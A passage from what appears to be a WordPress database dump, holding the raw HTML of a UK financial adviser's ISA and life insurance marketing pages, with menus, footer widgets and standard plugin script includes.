href=\"http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"http://www.equalitywalk.org.uk/portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/11/cats-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cats\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/cric-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cric\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/auto-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"auto\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/investing-income/\" title=\"Investing For Income\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/investing-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"investing\"/></a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	&#13;\n	<!-- W3TC-include-js-head -->&#13;\n&#13;\n	&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','ISAs - We Help You Make The Most of Your ISA Allowance','ISAs give you an essential opportunity for tax-efficient savings. Don’t be one of the countless thousands who miss out on using their allowance.','publish','closed','closed','','isas-we-help-you-make-the-most-of-your-isa-allowance','','','2017-09-21 16:34:33','2017-09-21 16:34:33','',0,'http://www.equalitywalk.org.uk/isas-we-help-you-make-the-most-of-your-isa-allowance',0,'page','',0),(77,1,'2017-09-21 16:34:34','2017-09-21 16:34:34','<body class=\"page page-id-7183 page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Stakeholder Pensions</a></li>&#13;\n		<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Occupational Pensions</a></li>&#13;\n		<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">More Information&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-7183 current_page_item menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Life Insurance										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Life Insurance</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n	<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-7183\" class=\"post-7183 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Life Insurance</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n			<span class=\"updated\" style=\"display: none;\">2017-12-02T09:54:05+00:00</span>&#13;\n																								<div class=\"post-content\">&#13;\n				<h1 style=\"text-align: center;\"><b>How Life Insurance Can Save a Family From Destitution</b></h1>&#13;\n<h3 style=\"text-align: center;\">Our aim is to leave you feeling safe, protected and reassured for the future, while saving you money in the present.&#13;\n</h3><p style=\"text-align: center;\"/>&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/><div class=\"one_half\"> <style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>The Smallest Price = The Smallest Print?</h2><p/>&#13;\n<p>We’re dedicated to helping you make the right life insurance choices. Not the best choice for us, or the most expensive – simply the best choice for you and your unique circumstances.</p>&#13;\n<p> </p>&#13;\n<p>You may be just starting out and need some initial guidance. You might have existing cover in place. <b>Whoever you are, whatever your budget, we’ll find you the best cover</b> in a friendly, one-to-one manner that goes far beyond the remit of faceless price comparison.</p>&#13;\n<p> </p>&#13;\n<p>Our advice is honest, frank and regulated for your reassurance – whether you buy from us or not, we want to leave you feeling more in control of your options.</p>&#13;\n<p> </p>&#13;\n<p><b>Life insurance – the essential cover</b></p>&#13;\n<p> </p>&#13;\n<p>If you have dependents who would need financial support should you die unexpectedly, life insurance is THE essential cover. It’s the type of crucial policy that needs to be right, simply <i>has to</i> pay out – and that’s why we delve into the small print on your behalf.</p>&#13;\n<p> </p>&#13;\n<p>In our brief life insurance review, we’ll help you discover flexible insurance options that can provide proper, secure cover whatever happens.</p>&#13;\n<p/></section></div></div><div class=\"one_half last\"/><div class=\"clearboth\"/><div class=\"accordian\"/><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>How we will help you make the Life Insurance choices</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\"/>&#13;\n<p><b>Right Cover<br/></b>Lump sum or regular income? Not too much or too little, we’ll find you the cover to suit your situation and your budget?<!--?xml:namespace prefix = \"o\" ns = \"urn:schemas-microsoft-com:office:office\" /--></p>&#13;\n<p><b>Better Prices</b><br/>&#13;\nWe’ll save on your premiums, but we don’t just hide behind a marked down price. Our discounts are always on the right insurance policy for you.</p>&#13;\n<p><b>Better Small Print</b><br/>&#13;\nAs we’ve said already, life insurance simply has to pay out. We maximise your chances by reducing or mitigating any exclusions from your policy.</p>&#13;\n							</div>&#13;\n											</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = 